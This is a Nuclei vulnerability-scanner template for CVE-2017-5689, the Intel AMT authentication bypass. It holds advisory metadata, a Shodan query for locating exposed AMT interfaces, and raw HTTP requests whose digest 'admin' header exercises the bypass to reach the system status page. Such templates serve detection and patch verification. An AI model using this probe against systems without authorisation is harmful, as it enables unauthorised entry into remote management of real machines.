nuclei-templates/cves/2017/CVE-2017-5689.yaml

45 lines
1.6 KiB
YAML

id: CVE-2017-5689
info:
name: Intel Active Management Technology - Authentication Bypass
author: pdteam
severity: critical
description: |
An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).
reference:
- https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
- https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
- https://www.embedi.com/news/mythbusters-cve-2017-5689
- https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-5689
metadata:
shodan-query: title:"Active Management Technology"
tags: cve,cve2017,amt,intel,tenable,kev
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /hw-sys.htm HTTP/1.1
Host: {{Hostname}}
digest-username: admin
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "System Status"
- "Active Management Technology"
condition: and
- type: status
status:
- 200